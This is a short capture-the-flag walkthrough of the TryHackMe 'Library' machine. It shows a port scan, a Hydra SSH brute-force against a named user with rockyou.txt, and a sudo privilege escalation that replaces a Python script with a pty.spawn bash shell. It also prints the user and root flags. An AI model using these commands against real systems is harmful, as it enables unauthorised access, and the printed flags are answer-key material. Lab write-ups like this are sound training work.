Library - TryHackMe Walkthrough

Scan the machine:'

We first find the list of services that are running on the machine. We use the below Rustscan command to get the services along with versions of these services.

rustscan -a 10.10.54.138 -- -A         

There are two services, SSH and Apache web server, running on ports 22 and 80.

Enumerate web server:

"Accessing port 80 on a browser shows us the following webpage. We notice a possible username, 'meliodas,' mentioned on the webpage."

We employed Hydra for SSH brute-forcing using the username meliodas and rockyou.txt as the wordlist, successfully uncovering a valid password.

hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://10.10.54.138         

Gain initial access:

After using the discovered password to log into the machine, we located the user.txt file in the user's home directory. Additionally, we observed an intriguing Python script in the same directory.

user.txt

Ans. 6d488cbb3f111d135722c33cb635f4ec

Exploit privilege escalation:

Check for SUID binaries, writable configuration files, running services with high privileges, etc.

After using the discovered password to log into the machine, we located the user.txt file in the user's home directory. Additionally, we observed an intriguing Python script in the same directory.

There is a file named bak.py which can be run as root…but wait it cannot be edited by the user meliodas

So, let’s create a new file.

rm bak.py
touch bak.py
echo 'import pty;pty.spawn("/bin/bash")' > bak.py
sudo python /home/meliodas/bak.py        

cd /root 
cat root.txt        

root.txt

Ans. e8c8c6c256c35515d1d344ee0488c617

Thanks for reading :